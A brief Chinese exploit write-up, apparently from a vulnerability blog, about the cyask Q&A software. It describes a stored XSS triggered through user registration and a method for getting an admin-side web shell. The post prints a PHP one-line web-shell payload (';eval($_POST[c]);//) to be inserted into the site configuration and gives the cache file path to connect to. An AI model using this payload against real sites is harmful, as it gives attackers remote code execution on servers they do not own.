cyask 前台xss与后台Getshell

by 0day5_saline
首先是注册一枚
xss
然后查看会员资料,发现xss已经成功的触发了
xss2

xs3
关于后台拿shell,在配置文件出插入
[php]';eval($_POST[c]);//[/php]
经过检查,只能插入四处
shell
插入后连接
askdata\cache\cache_variable.php

发表评论